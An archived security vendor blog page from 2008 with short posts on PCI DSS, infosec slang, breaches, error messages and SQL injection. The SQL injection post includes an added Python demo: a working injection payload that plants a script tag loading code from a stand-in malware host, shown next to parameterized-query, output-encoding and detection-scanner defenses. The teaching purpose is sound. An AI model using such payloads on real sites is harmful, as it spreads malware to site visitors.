Barry Shteiman: August 2008 Archives

I'm reading the news and it's like watching Mythbusters. On one hand, NASA managed to find "life" in space. On the other hand, my myth of NASA's security is busted. For the sake of discussion, it does not matter how the virus got there, or whether it is dangerous or just annoying. The simple fact is that there are no more sanctuaries.

I hate to sound like I'm spreading FUD, and I hope that no one will Defudder me, but there are some questions that should be asked.
August 28, 2008

PCI version 1.2 is coming

PCI DSS version 1.2 is starting to make its rounds. Having been through 1.0 and then 1.1, this new version continues to give me the warm and fuzzies about this standard. Why? Because it's just so reasonable. I know people will take issue with that, but if you've been around regulations for a while you know what I mean (does anyone remember HIPAA and all the cycles we went around on that? Or the SOX/COBIT meat grinder?).

Amichai and I held a webinar last week. Recalling the rush around 1.1 as organizations tried to get their heads around the requirements, we decided to help folks get a head start. Our net takeaway is the old Hitchhiker's Guide to the Galaxy adage: "Don't Panic."



There's a New Talk in the Block

After watching Chicago Hope, ER and Grey's Anatomy, I can now follow some of the medical lingo thrown around here and there. With NYPD Blue, the various CSIs and Law & Orders, I got to know some police slang. From LA Law, The Practice and Law & Order (two for the price of one!) I learned some lawyer talk. Even Buffy the Vampire Slayer enriched my gothic vocab.


And now it's the security industry's turn to put a list together, before we find ourselves ashamedly bewildered couch potatoes. While not as comprehensive as Douglas Adams and John Lloyd's "The Meaning of Liff", here are some terms I gathered for those very common infosec concepts that we all need names for:

  • Malvertisements: malicious ads that route the user to a malware site, sometimes on a click and sometimes without one. Drive-by downloads thrive on malvertisements.
  • Freetards: mainly used to describe those who click on malvertisements promoting free proprietary software, free movies and free songs. Remember, you get what you pay for (or perhaps, you pay for what you get for free).
  • Hacktivism: hacking with a political or social agenda. Hacktivists usually target popular websites in order to deface them with their message. A popular defacement method is SQL Injection.
  • Great Firewall of China: China's strict policy of IP and content filtering. Hacktivists usually try to find a way to bypass the Great Firewall of China.
  • Hacker-ogler: one who hacks into a webcam.

And may I add one of my own:

  • Defudder: a blogger or forum member who refutes the FUD (Fear, Uncertainty, Doubt) that vendors try to feed the non-technical user; also, the act of doing so.

Let's practice some geek talk now: "Don't be a freetard and click that link! It's probably a malvertisement planted there by a hacktivist who couldn't get past the Great Firewall of China."


Feel free to post your dictionary additions in the comments sections!

So, in an attempt to overcome coffee deprivation, I am trying to read some trade rags. Here's what I dug up, similar to what my colleague Sharon posted recently: "This Year's Data Breaches Surpass 2007 Totals". We are now "ahead" of the 2007 numbers. So, sort of like the opposite of "tax freedom day," each year we move the date at which we hit last year's numbers earlier. Despite that, I take it as a good sign: while the number of breaches is increasing, people are becoming more aware and are starting to report them as well (voluntarily or involuntarily). There is definitely light at the end of the tunnel, and, no, it is not that of an oncoming train :-)
In the world of media, ratings are everything; they are the industry's lifeblood. Check the US TV buzz pulse here. Success and failure are determined by the ratings value: daily and weekly statistics, all based on statistical sampling.

When it comes to security and auditing, sampling is simply not good enough. The leaders at Fuji Television Network, Japan's leading television broadcasting company (they also broadcast Dragon Ball Z; ask your kids...), know that. One of the key reasons for selecting SecureSphere, according to Mr. Satoshi Morimoto, Manager of Information Security for Fuji Television Network, was that "SecureSphere provides us with full details on database queries and responses."

August 26, 2008

You Create The Caption



Image source: http://www.oliverdunne.com/alldone/comics/4%20-%20No%20Coffee.png

August 24, 2008

Error: No Errors Found

My all-time favorite Donald Rumsfeld quote:

There are known knowns. There are things we know that we know. There are known unknowns. That is to say, there are things that we now know we don't know. But there are also unknown unknowns. There are things we do not know we don't know.

Ask anyone who has used a piece of software for long enough and they'll tell you that error messages should provide helpful information and advice, not only for the user but also for tech support and maintenance programmers. The web is full of examples of useless and stupid error messages, like those in this classic article from 1998.

No doubt error messages should be useful, but even a poor message is, in most cases, far better than no message at all. I've seen individual developers and even companies take the shortest path to "solving" a problem by adopting the totally wrong DTTC approach (Don't Tell The Customer), thinking that they can sweep a temporary or minor event under the rug, and in doing so creating a bigger problem of unknown unknowns.
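As an added illustration (not code from the original post), here is how the DTTC shortcut looks in Python next to the alternative. The payment gateway, the order and the host name inside the exception are constructed stand-ins, not anything from the post. The practitioner's point is twofold: a swallowed exception produces exactly the unknown unknown the post warns about, but an error message that dumps internals (host names, connection strings, stack traces) to the customer is its own security problem. The middle path is to log the full detail under a reference id and show the customer a message that is actionable without being revealing.

```python
import logging
import uuid

# In-memory log sink so the sample runs offline; a real service would ship
# these records to its logging pipeline instead.
log = logging.getLogger("payments")
log.setLevel(logging.DEBUG)
log.propagate = False


class ListHandler(logging.Handler):
    """Collects formatted log records (traceback included) in a list."""

    def __init__(self):
        super().__init__()
        self.records = []

    def emit(self, record):
        self.records.append(self.format(record))


handler = ListHandler()
handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
log.addHandler(handler)


class FakeGateway:
    """Constructed stand-in for a payment gateway. When `fail` is set it
    raises with the kind of internal detail a real client library would
    include: host names and a connection string."""

    def __init__(self, fail):
        self.fail = fail

    def charge(self, order):
        if self.fail:
            raise ConnectionError(
                "gateway timeout host=pay-int-03 dsn=pg://billing@10.0.4.7/txn")
        return {"txn": "ok"}


def charge_dttc(gateway, order):
    # "Don't Tell The Customer": the failure is swallowed, the caller sees
    # success, and nobody (user, support, or the log) learns that an order
    # was never charged. This is the unknown unknown.
    try:
        gateway.charge(order)
    except Exception:
        pass
    return {"status": "ok"}


def charge_reported(gateway, order):
    # Full detail, stack trace and all, goes to the log under a short
    # reference id. The customer sees the id and what to do with it, but
    # none of the internals. Support can join the two sides by the id.
    try:
        gateway.charge(order)
    except Exception:
        ref = uuid.uuid4().hex[:8]
        log.exception("charge failed ref=%s order=%s", ref, order["id"])
        return {
            "status": "error",
            "ref": ref,
            "message": (f"Your payment could not be processed. "
                        f"Quote reference {ref} when contacting support."),
        }
    return {"status": "ok"}
```

The reference id is the piece that makes the message useful to tech support without making it useful to an attacker: it carries no information by itself, but it lets a support engineer find the one log record that does.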

In a rather unusual email, Google's Android security team approached the security community earlier this week via the Full Disclosure mailing list, introducing themselves and asking for moral support and responsible disclosure. Amichai and I talked recently about responsible disclosure (here, here and here). The Android security team at Google took no chances, promising credit only to those who play by their rules:

Our vulnerability bulletins will credit responsible reporters of any flaws.

If you haven't had a chance to read Google's mail, you should. It's fun reading; here are my comments...
August 22, 2008

Hack With New People

Do you have the next great web idea but lack technical staff? Do you have technical skills and are looking for the next big thing to drive your excitement and enthusiasm? There are several sites that try to connect entrepreneurs with highly skilled professionals, but JustHackIt is the first site dedicated to web applications. In its own words:

So the idea is to connect people who want to build something RIGHT NOW. Ideas can be simple 1 page websites or complex Google competitors. The main point is to just get started hacking with new people! Hopefully you'll meet your next co-founder or your 1 page website will be successful by itself. If you find out you don't work well with someone, try someone else. No pressure.
 
Simple idea, nicely executed. Some of the ideas are good. From an ROI perspective, it looks like a good $7 investment. According to Centernetworks, the site is now for sale. The use of hack-words, in all their derivations and inflections, makes sense as a buzz-generation tool as well. If nothing else works, it can always carry on as a hacker dating site.



As a follow up to our ADC webinar on SQL Injection led by our CTO - Amichai Shulman, I had an opportunity to meet with some of our customers and discuss the latest SQL attack trends.

Our partner, AppSec Consulting, chose the location, which I admit was not to my liking. They chose an indoor gun range, and while for some people shooting stuff is the ultimate stress reliever, I'm not one of them. As a veteran lieutenant of the Israel Defense Forces, shooting brings up some stressful memories. If you have never experienced shooting in an indoor range, let me tell you: it's scary. The sound produced by gunfire is deafening outdoors, but when the acoustic energy is confined to a small indoor space such as a firing range, it gets even louder. Add to that the fact that some shooters are new to the experience, and some (not our customers) may be doing stupid, crazy things... oh, well. I stayed outside while the guys were having fun.

But as I mentioned, we spent some time talking about SQL Injection attacks as well. When we talk about SQL Injection, we usually think about protecting the application with a web application firewall. Less often do we talk about the impact on the database behind the website. In the past, most SQL Injection attacks tried to pull valuable information out of the database, and those attacks didn't compromise or change anything on the RDBMS itself. Lately, though, we see more attacks that try to manipulate the content of the RDBMS. The example I used in my demo showed how SQL Injection can be used to write a JavaScript reference into the database: the compromised database ends up holding a script tag that points to a JS file on a separate domain. Any web page that is now built from the compromised data runs that script, downloading malicious code and silently distributing malware to every visitor of the connected site. In effect the database becomes the delivery vehicle for a stored cross-site scripting attack, and the pages that serve the attacker's script can be quite different from the page that had the injection flaw.

A compromised database entry (screenshot in the original post).

The bottom line is that databases are a critical component of any web application, and when protecting the application you cannot ignore the database itself. Databases should be scanned and monitored continuously so that compromised content is caught before it is served.
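To make the attack concrete, here is an added example, not code from the original post or from Imperva: a Python script using the standard-library sqlite3 module. It assumes a hypothetical `news` table behind a page that lets an editor update an article body, and uses an illustrative malware domain; none of those names come from the post, and the real 2008 campaigns ran against other database engines with more elaborate statements (a cursor over every text column in every table) than the single UPDATE used here. The vulnerable handler builds its UPDATE by string concatenation, so a crafted body appends a script tag to every row; the page that renders the rows then serves the attacker's JavaScript to every visitor. The safe handler binds the body as a parameter, the safe renderer encodes its output, and a small scanner shows the kind of check the post's closing point calls for: looking through stored text for markup that has no business being there.

```python
import html
import re
import sqlite3

# Constructed sample data. The domain is illustrative, not from the post.
SCRIPT_TAG = '<script src="http://malware.example/x.js"></script>'


def build_db():
    """A tiny in-memory content store standing in for the site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO news (title, body) VALUES (?, ?)",
                     [("Welcome", "Hello, world."),
                      ("Schedule", "Talks start at nine.")])
    conn.commit()
    return conn


def update_body_vulnerable(conn, news_id, body):
    # The body is spliced into the statement text, so whoever controls it
    # controls the SQL. The integer id is cast, so the string is the way in.
    sql = f"UPDATE news SET body = '{body}' WHERE id = {int(news_id)}"
    conn.execute(sql)
    conn.commit()


def update_body_safe(conn, news_id, body):
    # Bound parameter: the body travels as data and can never become SQL.
    conn.execute("UPDATE news SET body = ? WHERE id = ?", (body, int(news_id)))
    conn.commit()


def attack_payload():
    # Closes the string literal, appends the tag to the EXISTING body so the
    # page still looks normal, rewrites the WHERE clause to hit every row,
    # and comments out the handler's own WHERE clause.
    return "'||body||'" + SCRIPT_TAG + "' WHERE 1=1 --"


def render_vulnerable(conn):
    # Stored content is emitted verbatim; a tag planted by the injection
    # becomes live script in every visitor's browser.
    rows = conn.execute("SELECT title, body FROM news ORDER BY id").fetchall()
    return "".join(f"<h2>{t}</h2><p>{b}</p>" for t, b in rows)


def render_safe(conn):
    # HTML-encoding on output turns stored markup into inert text, whatever
    # path it took into the database.
    rows = conn.execute("SELECT title, body FROM news ORDER BY id").fetchall()
    return "".join(f"<h2>{html.escape(t)}</h2><p>{html.escape(b)}</p>"
                   for t, b in rows)


# Deliberately crude: in practice tune per column and alert on any hit.
SUSPICIOUS = re.compile(r"<\s*script\b|<\s*iframe\b|javascript:", re.IGNORECASE)


def scan_for_injected_markup(conn, table, columns):
    """Return (rowid, column) pairs whose text looks like injected markup.
    Table and column names come from the operator's own allow-list, never
    from user input, which is why building the SELECT from them is fine."""
    hits = []
    for col in columns:
        for rowid, value in conn.execute(f"SELECT rowid, {col} FROM {table}"):
            if isinstance(value, str) and SUSPICIOUS.search(value):
                hits.append((rowid, col))
    return hits


if __name__ == "__main__":
    conn = build_db()
    update_body_vulnerable(conn, 1, attack_payload())
    print(scan_for_injected_markup(conn, "news", ["title", "body"]))
```

Note the layering. Parameterized queries stop the tag from getting in through this handler; output encoding stops it from executing if some other path (a DBA tool, a batch import, another vulnerable page) put it there; and the scan over stored content catches what both of the others missed, which is the monitoring the post argues for.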

I hope our next event takes place at a less stressful location - perhaps even an outdoor gun range. How about paintball? I heard that's a lot of fun.

